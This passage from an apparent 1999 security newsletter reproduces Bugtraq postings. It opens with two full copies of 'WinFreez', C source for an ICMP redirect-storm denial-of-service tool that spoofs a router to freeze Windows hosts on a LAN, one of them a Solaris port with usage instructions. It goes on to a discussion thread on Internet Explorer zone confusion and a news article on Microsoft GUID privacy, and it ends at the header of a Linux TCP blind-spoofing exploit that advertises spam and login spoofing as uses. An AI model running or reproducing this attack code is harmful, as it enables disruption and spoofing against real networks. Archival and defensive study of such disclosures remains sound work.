icmp_dun.id_ts.its_otime #define icmp_rtime icmp_dun.id_ts.its_rtime #define icmp_ttime icmp_dun.id_ts.its_ttime #define icmp_ip icmp_dun.id_ip.idi_ip #define icmp_mask icmp_dun.id_mask #define icmp_data icmp_dun.id_data }; u_short in_cksum (u_short *addr, int len); void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ); void main (int argc, char **argv) { time_t wtime; char *sendtoip, *sendfromip; int s, on; if (argc != 4) { fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]); exit (1); } sendtoip = (char *)malloc(strlen(argv[1]) + 1); strcpy(sendtoip, argv[1]); sendfromip = (char *)malloc(strlen(argv[2]) + 1); strcpy(sendfromip, argv[2]); wtime = atol(argv[3]); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf (stderr, "socket creation error\n" ); exit (1); } #ifdef IP_HDRINCL if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) { fprintf (stderr, "sockopt IP_HDRINCL error\n" ); exit (1); } #endif printf("winfreez by Delmore, <delmore@moscowmail.com>\n"); printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n"); printf("sendto = %s\n", sendtoip); printf("sendfrom = %s\n", sendfromip); printf("time = %i s\n", wtime); attack( sendtoip, sendfromip, wtime, s ); free( (void *) sendtoip ); free( (void *) sendfromip ); } void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ) { time_t curtime, endtime; int i1, i2, i3, i4; char redir[21]; char buf[100]; struct ip *ip = (struct ip *) buf; struct icmp *icmp = (struct icmp *) (ip + 1); struct hostent *hp; struct sockaddr_in dst; if(wtime==0) return; if ((hp = gethostbyname (sendtoip)) == NULL) if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1) { fprintf (stderr, "%s: unknown sendto\n", sendtoip); exit (1); } if ((hp = gethostbyname (sendfromip)) == NULL) if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1) { fprintf (stderr, "%s: unknown sendfrom\n", sendfromip); exit (1); } endtime = time(NULL) + wtime; srand((unsigned int) endtime); do { bzero (buf, sizeof buf); /* sendto/gateway */ hp = gethostbyname (sendtoip); bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length); bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length); /* sendfrom */ hp = gethostbyname (sendfromip); bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length); /* generate redirect*/ i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0)); i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); bzero (redir, sizeof redir); sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 ); hp = gethostbyname (redir); bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length); ip->ip_v = 4; ip->ip_hl = sizeof *ip >> 2; ip->ip_tos = 0; ip->ip_len = htons (sizeof buf); ip->ip_id = htons (4321); ip->ip_off = 0; ip->ip_ttl = 255; ip->ip_p = 1; ip->ip_sum = 0; /* kernel fills this in */ bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof(ip->ip_dst.s_addr)); icmp->icmp_ip.ip_v = 4; icmp->icmp_ip.ip_hl = sizeof *ip >> 2; icmp->icmp_ip.ip_tos = 0; icmp->icmp_ip.ip_len = htons (100); /* doesn't matter much */ icmp->icmp_ip.ip_id = htons (3722); icmp->icmp_ip.ip_off = 0; icmp->icmp_ip.ip_ttl = 254; icmp->icmp_ip.ip_p = 1; icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip); dst.sin_addr = ip->ip_dst; dst.sin_family = AF_INET; icmp->icmp_type = ICMP_REDIRECT; icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */ icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof(*ip)); if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < 0 ) { fprintf (stderr, "sendto error\n"); exit (1); } }while (time(NULL)!=endtime); } /* * in_cksum -- Checksum routine for Internet Protocol family headers (C * Version) - code from 4.4 BSD */ u_short in_cksum (u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } -=- And a Solaris version: Date: Tue, 9 Mar 1999 22:34:32 -0500 From: Max Schubert <mschube@jgvandyke.com> To: BUGTRAQ@netspace.org Subject: Winfreeze.c for Solaris ... Hi, Script kiddie number 25006 here :) ... apologize if this is too trivial to be worth your time .... This is just a port of the Winfreeze.c ICMP redirect exploit for Solaris (posted earlier today) ... tested using Solaris 2.5.1 ... max ------- /* WinFreez.c by Delmore <delmore@moscowmail.com> ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box in LAN. Usage: winfreez sendtoip sendfromip time where <sendtoip> is victim host, <sendfromip> is router for victim host, <time> is time in seconds to freeze victim. Note: I've written small exploit for freeze win9x/nt boxes in LAN. Proggy initiates ICMP/Redirect-host messages storm from router (use router ip). Windows will receive redirect-host messages and change own route table, therefore it will be frozen or slowly working during this time. On victim machine route table changes viewing with: ROUTE PRINT command in ms-dos box. Exploit show different result for different system configuration. System results: p200/16ram/win95osr2 is slowly execute application after 20 seconds of storm. p233/96ram/nt4-sp4 is slowly working after 30 seconds of storm. p2-266/64ram/win95 working slowly and can't normal execute application. Compiled on RedHat Linux 5, Kernel 2.0.35 (x86) gcc ./winfreez.c -o winfreez --- for Slackware Linux, Kernel 2.0.30 If you can't compile due to ip_sum not defined errors, replace (line 207): ip->ip_sum = 0; to line: ip->ip_csum = 0; --- Soldiers Of Satan group Russia, Moscow State University, 05 march 1999 http://sos.nanko.ru Thanx to Mark Henderson. */ #include <stdio.h> #include <stdlib.h> #include <time.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <errno.h> /* * Structure of an icmp header (from sparc header). */ u_short in_cksum (u_short *addr, int len); void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ); void main (int argc, char **argv) { time_t wtime; /* setsockopt on Solaris 2.5.1 wants (char *) for 4th arg */ char *sendtoip, *sendfromip, *on; int s; if (argc != 4) { fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]); exit (1); } sendtoip = (char *)malloc(strlen(argv[1]) + 1); strcpy(sendtoip, argv[1]); sendfromip = (char *)malloc(strlen(argv[2]) + 1); strcpy(sendfromip, argv[2]); wtime = atol(argv[3]); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf (stderr, "socket creation error: %s\n", strerror(errno)); exit (1); } #ifdef IP_HDRINCL if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof (on)) < 0) { fprintf (stderr, "sockopt IP_HDRINCL error\n" ); exit (1); } #endif printf("winfreez by Delmore, <delmore@moscowmail.com>\n"); printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n"); printf("sendto = %s\n", sendtoip); printf("sendfrom = %s\n", sendfromip); printf("time = %i s\n", wtime); attack( sendtoip, sendfromip, wtime, s ); free( (void *) sendtoip ); free( (void *) sendfromip ); } void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ) { time_t curtime, endtime; int i1, i2, i3, i4; char redir[21]; char buf[100]; struct ip *ip = (struct ip *) buf; struct icmp *icmp = (struct icmp *) (ip + 1); struct hostent *hp; struct sockaddr_in dst; if(wtime==0) return; if ((hp = gethostbyname (sendtoip)) == NULL) if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1) { fprintf (stderr, "%s: unknown sendto\n", sendtoip); exit (1); } if ((hp = gethostbyname (sendfromip)) == NULL) if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1) { fprintf (stderr, "%s: unknown sendfrom\n", sendfromip); exit (1); } endtime = time(NULL) + wtime; srand((unsigned int) endtime); do { bzero (buf, sizeof buf); /* sendto/gateway */ hp = gethostbyname (sendtoip); bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length); bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length); /* sendfrom */ hp = gethostbyname (sendfromip); bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length); /* generate redirect*/ i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0)); i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); bzero (redir, sizeof redir); sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 ); hp = gethostbyname (redir); bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length); ip->ip_v = 4; ip->ip_hl = sizeof *ip >> 2; ip->ip_tos = 0; ip->ip_len = htons (sizeof buf); ip->ip_id = htons (4321); ip->ip_off = 0; ip->ip_ttl = 255; ip->ip_p = 1; ip->ip_sum = 0; /* kernel fills this in */ bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof (ip->ip_dst.s_addr)); icmp->icmp_ip.ip_v = 4; icmp->icmp_ip.ip_hl = sizeof *ip >> 2; icmp->icmp_ip.ip_tos = 0; icmp->icmp_ip.ip_len = htons (100); /* doesn't matter much */ icmp->icmp_ip.ip_id = htons (3722); icmp->icmp_ip.ip_off = 0; icmp->icmp_ip.ip_ttl = 254; icmp->icmp_ip.ip_p = 1; icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip); dst.sin_addr = ip->ip_dst; dst.sin_family = AF_INET; icmp->icmp_type = ICMP_REDIRECT; icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */ icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof (*ip)); if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < 0 ) { fprintf (stderr, "sendto error\n"); exit (1); } }while (time(NULL)!=endtime); } /* * in_cksum -- Checksum routine for Internet Protocol family headers (C * Version) - code from 4.4 BSD */ u_short in_cksum (u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } @HWA 04.5 Unknown Zone: Windows doesn't properly distinguish between intra and internet zones ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 5 Mar 1999 21:53:18 -0500 From: Jim Paris <jim@JTAN.COM> To: BUGTRAQ@netspace.org Subject: More Internet Explorer zone confusion Even after the patch described in Microsoft Security Bulletin MS98-016 (http://www.microsoft.com/security/bulletins/ms98-016.asp), IE4 still has big problems with distinguishing between sites that belong in the "Internet Zone" and sites that belong in the "Local Intranet Zone". MS98-016 dealt with addresses such as http://031713501415/, which resolve to Internet hosts but are categorized as being in the "Local Intranet Zone". I've found two cases where the problem still exists. The first is when the user has the "Domain Suffix Search Order" in the TCP/IP DNS settings set to include domains such as "com". In that case, the address http://microsoft/ will retrieve the page at http://microsoft.com/ but it will be considered to be in the "Local Intranet Zone". The second case occurs when a host has an assigned alias in the hosts table (C:\WINDOWS\HOSTS). A host table entry such as: 207.46.131.13 hello will cause the URL http://hello/ to retrieve the page at http://207.45.131.13/, but (yep, you guess it) Internet Explorer still considers it to be in the "Local Intranet Zone". This has security implications, since settings for the Local Intranet Zone may be (and, by default, ARE) less secure than those for the Internet Zone. And the funny part? Microsoft's response when I told them this: --8<---cut here----------------------------------------- Hi Jim - Had a talk with one of the IE developers, and this behavior is correct. Here's why: it's impossible to tell from an IP address whether it's internal or external. 100.100.100.100, or any other address, could be either internal or external, depending on whether you're behind a firewall or not. That means that IE has to rely on the URL. By convention, an URL that does not end with a "dot-something" (.com, .edu, .gov, etc) is assumed to be an internal site. I'm told that this is how all web browsers make the distinction. You have to make specific reconfigurations to allow the dotless URLs to resolve externally. Thanks, Secure@Microsoft.Com --8<---cut here----------------------------------------- "This behavior is correct"?!?!?! Give me a break. They obviously didn't think so when they released the MS98-016 bulletin. Jim Paris jim@jtan.com -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 03:56:27 -0500 From: Jeremy Nimmer <bugtraq.user@parity.mit.edu> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion >MS98-016 dealt with addresses such as http://031713501415/ >... >user has the "Domain Suffix Search Order" in the TCP/IP DNS settings >... >The second case occurs when a host has an assigned alias in the hosts >... >"This behavior is correct"?!?!?! Give me a break. They obviously >didn't think so when they released the MS98-016 bulletin. > >Jim Paris >jim@jtan.com The difference between MS98-016 and your examples is simple. The bulletin addressed an issue where an external site could, without your control, fool your browser into thinking a remote site was "local intranet". In your examples, the user must choose specific settings to allow the problem to occur. If you are concerned about the problem, simply remove .com, etc. >from your DNS suffix search, and don't put nasty hosts in your hosts file. The zone settings are not meant to be rock-solid security protection. If they pose a risk to you, set all zones to the maximum security. This was all already talked about when the above-mentioned bulletin came out. In the end, this is not a "bug" in the browser - it's a configuration problem. While worthy of mention, it does not deserve flamage. Thanks, -= remmiN ymereJ | Jeremy Nimmer =- -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 23:37:28 +1300 From: Oliver Lineham <oliver@LINEHAM.CO.NZ> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion At 21:53 5/03/99 -0500, you wrote: Yech. >That means that IE has to rely on the URL. By convention, an URL that does >not end with a "dot-something" (.com, .edu, .gov, etc) is assumed to be an >internal site. I'm told that this is how all web browsers make the >distinction. You have to make specific reconfigurations to allow the >dotless URLs to resolve externally. Thanks, This is insane - and most probably not how it distinguishes domains at all. Such a system implies that the "dot-something"s are hard-coded into the browser! This would be a similar flaw to the original cookie specification's one about domains that I announced last year. Consider: - Country domains. They're not dot-somethings, but under this regime anything from somewhere like New Zealand (.nz) would be a "Local Intranet Site". - New TLDs. Internic goes and adds a .web or .store or something that didn't exist when the browser was released. I'm sure all the e-commerce sites on .store would love their servers being considered "Local Intranet Sites"! If this is how the zones are implemented, then its insane. If not, then IE's claim of being able to distinguish intranet sites from internet ones is an outright lie and the "feature" should be removed. Oliver --------------------------------------------------- Internet Services / Webdesign / Strategic Planning PO Box 30-481, Lower Hutt, NZ oliver@lineham.co.nz Phone +64 4 566-0627 Facsimile +64 4 570-1900 -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 09:06:23 +0000 From: David E. Smith <dave@TECHNOPAGAN.ORG> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion On Fri, 5 Mar 1999, Jim Paris wrote about the Local Intranet Zone. All the comments made are, technically, correct, but Microsoft could have at least tried. None of these are foolproof, but they're a start. * Be paranoid about entries in the hosts file. Arguably, hosts files are obsolete, thanks to DNS. (No, I won't make the argument.) * Warning dialog boxes for the above, and maybe for anything where the TLD is guessed at. (The http://microsoft/ example. Just warn the user that the requested site was guessed, give some sane options like `Go there, treat it as Internet', `Go there, treat it as local', `Don't go there', and so on.) * Anything that doesn't resolve to a designated local zone (10.*.*.*, and the other reserved addresses) gets the same warning. Or, just change the default behaviour on all those to treat the site as Internet rather than intranet. Probably easier that way, though a bit more troublesome for the user, especially when we guess wrong. Care to take bets on whether anything even remotely like this is ever done? ...dave -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 00:18:10 -0800 From: Walt Armour <walt@BLARG.NET> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion I would agree that these are still issues but there is a difference between them and the original problem. With the original problem any site could redirect you to a site and make it look like Local Intranet simply by using the 'http://031713501415/' format. With these two new issues someone must have direct knowledge about your machine's configuration or have direct access to your machine in order to make a not-quite-too-common configuration change. If either of these situations occurs then the safety level of my browser will quickly become the least of my worries. :) IMO Microsoft is right in saying that the problems are (marginally) different. Whether or not their method for determining "local intranet" is right is a completely different subject. walt -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 11:07:19 -0600 From: iversen <signal11@MEDIAONE.NET> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion Oliver Lineham wrote: > - New TLDs. Internic goes and adds a .web or .store or something that > didn't exist when the browser was released. I'm sure all the e-commerce > sites on .store would love their servers being considered "Local Intranet > Sites"! > > If this is how the zones are implemented, then its insane. If not, then > IE's claim of being able to distinguish intranet sites from internet ones > is an outright lie and the "feature" should be removed. This seems to be trivial to resolve - put everything in the internet zone unless it matches a list containing the local intranets. Then do reverse-dns of everything that's allegedly inside the intranet and make sure everything matches up. It isn't a perfect solution, but it would make it substantially harder to fake a remote site as local. You also get the added benefit of not needing to worry about how IE resolves domains/ip addresses. -- signal11@mediaone.net | BOFH, Malign networks I'll give you the TCO of Linux as soon as my calculator stops saying "divide by zero error." -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 14:17:43 -0500 From: Jim Paris <jim@JTAN.COM> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion > The difference between MS98-016 and your examples is simple. The bulletin > addressed an issue where an external site could, without your control, fool > your browser into thinking a remote site was "local intranet". And this can occur with my examples as well. I didn't control it at all. > In your > examples, the user must choose specific settings to allow the problem to > occur. If you are concerned about the problem, simply remove .com, etc. > from your DNS suffix search, and don't put nasty hosts in your hosts file. Just because I added a DNS suffix search order and put hosts into my hosts file does not (or, at least, SHOULD not) mean that I am choosing "specific settings to allow the problem to occur". How was I supposed to know that simplifying my life by adding a search suffix of ".com" was opening me up to a vulnerability? > In the end, this is not a "bug" in the browser - it's a configuration > problem. While worthy of mention, it does not deserve flamage. No, this is a bug in the browser. Changing something over at point A shouldn't affect my security at point B. -jim -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 11:58:55 -0800 From: Paul Leach <paulle@MICROSOFT.COM> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion > -----Original Message----- > From: Oliver Lineham [mailto:oliver@LINEHAM.CO.NZ] > Sent: Monday, March 08, 1999 2:37 AM > To: BUGTRAQ@NETSPACE.ORG > Subject: Re: More Internet Explorer zone confusion > > > At 21:53 5/03/99 -0500, you wrote: > > Yech. > > >That means that IE has to rely on the URL. By convention, > an URL that does > >not end with a "dot-something" (.com, .edu, .gov, etc) is > assumed to be an > >internal site. I'm told that this is how all web browsers make the > >distinction. You have to make specific reconfigurations to allow the > >dotless URLs to resolve externally. Thanks, > > This is insane - and most probably not how it distinguishes > domains at all. That's correct. I believe that the rule for Intranet zone is simple -- if the name has no "." and is less than 15 characters long, then it's Intranet zone. This algorithm works with the default configuration of Windows. If you configure your machine so that the above assumption is violated, then you'll get a mis-classification. When designing better ways of doing this, keep in mind that the primary tool that the browser has to work with is "gethostbyname" -- which, IMO, doesn't return enough information about how the name was resolved to be helpful for security purposes (even though it garnered some in the process of resolution). For example, it doesn't say whether /etc/hosts or LMHOSTS was used to resolve the name, or which DNS search suffix was used. Paul -------------------------------------------------------------------------------- Date: Mon, 8 Mar 1999 19:49:32 -0600 From: Jeremie <jer@JEREMIE.COM> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion (new issue) > The assumptions may indeed be flawed, but I don't understand how your > observations below demonstrate that. The assumption: [if the name has no "." and is less than 15 characters long, then it's Intranet zone] Simply: The name "ls" has no "." and is less than 15 characters, and yet it is a valid *Internet* host and should *not* be qualified as "Intranet Zone". Jeremie jer@jeremie.com -------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 01:59:08 -0500 From: Christopher Masto <chris@NETMONGER.NET> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion Is this intranet zone thing _really_ of any value? Why is there a built-in default assumption that something from a "local" server is more trustworthy? Consider the following situations: 1. A customer of your ISP, netmonger.net, is evil. They have a page that links or redirects to http://www/~evil/evil.html, taking advantage of the fact that your machine is configured with your ISP's domain in the search list. 2. You go to school at RPI. You have a dorm ethernet connection. Your machine is naive.dorm.rpi.edu, and you have dorm.rpi.edu in your domain search list. An evil person gets evil.dorm.rpi.edu, and you know the rest. 3. You work at Giganticorp and have access to high-level trade secrets. Giganticorp has an intranet where employees can put up their own web pages. An evil employee takes advantage of the default security settings to gain access to your secrets, which he sells to the competition. Numbers 1 and 2 ask the question, "Why are we assuming that a non-qualified host name implies intranet implies trust?" Number 3 asks the question, "Why are we assuming that intranet implies trust?" Another question is "How many people who use IE have no intranet?" Considering that there are a quantity of tools available to deploy IE at your company with preconfigured settings, why not default to not having this intranet zone. If Giganticorp needs to turn down the security, they can do so at the same time they're customizing the rest of the settings. I don't personally use Microsoft products, and I am not quite familiar with the specific security precautions that are disabled for the intranet zone, but if they're enough to cause concern on the Internet, the same problems can occur even when the browser isn't malfunctioning at all. -- Christopher Masto Director of Operations NetMonger Communications chris@netmonger.net info@netmonger.net http://www.netmonger.net Free yourself, free your machine, free the daemon -- http://www.freebsd.org/ -------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 08:58:43 +0100 From: Tilman Schmidt <Tilman.Schmidt@SEMA.DE> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion At 11:07 08.03.99 -0600, iversen wrote: >Oliver Lineham wrote: >> If this is how the zones are implemented, then its insane. If not, then >> IE's claim of being able to distinguish intranet sites from internet ones >> is an outright lie and the "feature" should be removed. > >This seems to be trivial to resolve - put everything in the internet zone >unless it matches a list containing the local intranets. Then do >reverse-dns >of everything that's allegedly inside the intranet and make sure everything >matches up. This is of course the correct way to implement an "intranet zone". It has, however, one serious drawback: you have to configure it. Consumer product manufacturers like Microsoft want their product to work as much "out of the box" as possible. However, IMHO there is no way to implement the concept of "intranet zone" reliably without actually telling the browser the exact extent of your intranet one way or other. Heuristics like "if there is no dot in the hostname then let's assume it is in the intranet" just aren't reliable enough to base a security mechanism on. At Mon, 8 Mar 1999 11:58:55 -0800, Paul Leach wrote: >I believe that the rule for Intranet zone is simple -- if the name has no >"." and is less than 15 characters long, then it's Intranet zone. This >algorithm works with the default configuration of Windows. If you configure >your machine so that the above assumption is violated, then you'll get a >mis-classification. It doesn't even work with the default configuration of Windows, because the basic assumption that every host with an FQDN in the same DNS domain as the client is also in the intranet zone is flawed. There are perfectly legitimate configurations where this is not the case. >When designing better ways of doing this, keep in mind that the primary tool >that the browser has to work with is "gethostbyname" -- which, IMO, doesn't >return enough information about how the name was resolved to be helpful for >security purposes (even though it garnered some in the process of >resolution). For example, it doesn't say whether /etc/hosts or LMHOSTS was >used to resolve the name, or which DNS search suffix was used. It is irrelevant how the name was resolved. You need a mechanism to specify the intended scope of your intranet unambiguously, instead of relying on some unspoken assumption like "for our purposes, 'intranet zone' will be taken to mean all hosts which happen to have at least one FQDN in the same domain as the client". -- Tilman Schmidt E-Mail: Tilman.Schmidt@sema.de (office) Sema Group Koeln, Germany tilman@schmidt.bn.uunet.de (private) "newfs leaves the filesystem in a well known state (empty)." - Henrik Nordstrom -------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 17:15:07 -0500 From: Jim Frost <jimf@FROSTBYTES.COM> To: BUGTRAQ@netspace.org Subject: Re: More Internet Explorer zone confusion |This is of course the correct way to implement an "intranet zone". |It has, however, one serious drawback: you have to configure it. |Consumer product manufacturers like Microsoft want their product |to work as much "out of the box" as possible. Since there is no intranet for most consumers this seems like largely a non-issue. Those with intranets in their home probably know enough to configure it properly. And businesses should have IT departments whose job it is to manage it. So what's the problem? |It doesn't even work with the default configuration of Windows, |because the basic assumption that every host with an FQDN in the |same DNS domain as the client is also in the intranet zone is |flawed. There are perfectly legitimate configurations where this |is not the case. Not only legitimate, but increasingly common. Cable modem customers, for instance, tend to have their entire region in the same "intranet": eg customer.ne.mediaone.net. I assure you that you don't want to treat the entire northeast region of MediaOne customers as trusted in any way, shape, or form. jim @HWA 04.6 Sniffing out MS Security Glitch the GUID (and how to defeat it?) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "If Microsoft starts compelling people to register, then its going to take a lot of time for people to disentangle their lives from Microsoft's sticky tentacles." From Wired/ZDNET http://www.wired.com/news/news/technology/story/18331.html Sniffing Out MS Security Glitch by Chris Oakes 5:30 p.m. 8.Mar.99.PST A security vulnerability that hides unique identifiers in Microsoft Office documents may affect files created by other software applications, according to the programmer who identified the breach. Other Office documents and browser cookies, and possibly even software from other companies, can store the unique identity codes, according to Richard Smith, president of Phar Lap Software in Cambridge, Massachusetts, who first reported the security glitch on Sunday. Smith discovered that Excel and Word applications fingerprint files with an identifying number. That number is used by the hardware that connects a PC to a local area network. The 32-digit numbers were designed long ago by developers of networking hardware to identify individual machines. "These things are slippery. These [numbers] are floating around -- it's hard to say where they're showing up," said Smith. Microsoft was not available for comment. The identifying number is trapped in the Windows registry file as a Globally Unique Identifier, or GUID, and embedded in a hidden part of documents created using Office, including Word, Excel, and PowerPoint. "I got email for someone mentioning that GUIDs are also put in Web-browser cookies. I did a quick scan on my Netscape cookies file and found a number of Web sites that were indeed using GUIDs for identification purposes," Smith said. It goes to show the ubiquity of the ID numbers, he said. "Anyone writing applications can use them. [The privacy issue] is an unintended side effect." The unique number can be easily traced to a person by searching for the number in documents known to be created by that person, according to Smith. Unknown documents could also be associated with that person using the identification number. "If you're in some really weird office-politics situation -- who knows?" he said. He plans to explore whether other Windows applications, such as software for creating Web pages, use the ID numbers. He's also interested in the behavior of the company's Outlook email software. Smith said users can easily find their own network address, then search their hard-disk content for documents containing the ID number to determine where it is surreptitiously stored. Users can find the number by selecting the Run command under the Windows Start menu and typing winipcfg to launch the Windows IP configuration utility. One of the fields appearing in the dialog box contains the user's "network adapter" address. "All I did was have a search utility scan the hard disk for occurrences of the Ethernet address," he said. Smith used one called Grep. "Anyone can do that and see how common it is." Certain types of text editors, known as hexadecimal editors, will reveal the invisible code in any file. One example of the editor is HexEdit. Smith made a related discovery when he found Microsoft was collecting the identification number users entered when registering their new copies of the company's Windows 98 operating system, prompting Microsoft to post an open letter to its customers. It said the company would publish software to remove the ID number from users' Windows registry file, a move designed to prevent the behavior from occurring in future documents. The company also said a subsequent update of Windows 98 would disable the software's registration feature so that the hardware ID would not be collected "unless the user checks the option to send hardware information to Microsoft." The company said it also plans to post a software tool on its Web site that will allow users to delete hardware-registration information from the Windows registry. But in a privacy advisory also issued Monday, a privacy-watchdog group demanded that Microsoft go further. "What I think is unprecedented here is that the problem is now on billions of documents around the world. The problem remains out there even if Microsoft fixed the applications," said Jason Catlett, president of Junkbusters. "We demand they publish and publicize free software to protect these files -- and that's not something Microsoft in its open letter said it would do. "[Users] really don't have an effective means of stopping [the problem] from happening short of switching to [another software product like] Corel WordPerfect," he said. Smith and privacy advocates worry that Microsoft already has built up a database of registration numbers, although the company said it plans to purge its own databases of any hardware-identification information that may have been inadvertently gathered without customers' consent. Microsoft said it was confident "that the hardware information is not being stored in our marketing databases, and we are investigating whether it is stored in any database at all within Microsoft." Catlett believes an independent auditor should oversee any such effort to purge the data, which could have been transferred to backup systems or related databases. "For me, the bottom line is Microsoft is getting information off of people's computer [that] they have no business getting." Addressing that issue, he said, "sounds like a patch to me." Catlett is disturbed by this wide-reaching impact. Combined with Microsoft's push for required registration, a possibility Catlett documented last week, he sees a quagmire for users trying to protect themselves. "If Microsoft starts compelling people to register, then its going to take a lot of time for people to disentangle their lives from Microsoft's sticky tentacles." And From HNN March 12th: contributed by spitfire Are you worried about the Microsoft Global Unique Identifier? You know, that number that is based on your MAC address, is embedded in all your documents and is transmitted to Redmond whenever you visit the Microsoft web site or register a product? Well Vector Development claims to have the solution, Guideon. Guideon claims to replace the GUID string with zeros or an optional string you choose. <sounds interesting, I could think of some choice strings, to replace the GUID with ... *grin* -Ed > Vector Development http://www.vecdev.com/guideon.html @HWA 05.0 Linux TCP flaw exploit code for Linux 2.0.35 and older. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* linux 2.0.35 and older * tcp flaw exploit (discovered by network associates, october 1998) * by scut (990310) * * description: linux does send the tcp data received in the SYN_RECEIVED * state if a FIN packet is send * affect: blind spoofing on linux systems with kernel version below 2.0.35 * useful for: SMTP spoofing (for the lamers to spam) * FTP/Telnet spoofing * for the lamers: no, you cannot spoof your mIRC with this * * for compilation you need libnet, a low level network library from route, * go to http://www.infonexus.com/~daemon9/ * then try with: * * gcc -o lin35 lin35.c -lnet -D_BSD_SOURCE=1 */ #include <stdio.h> 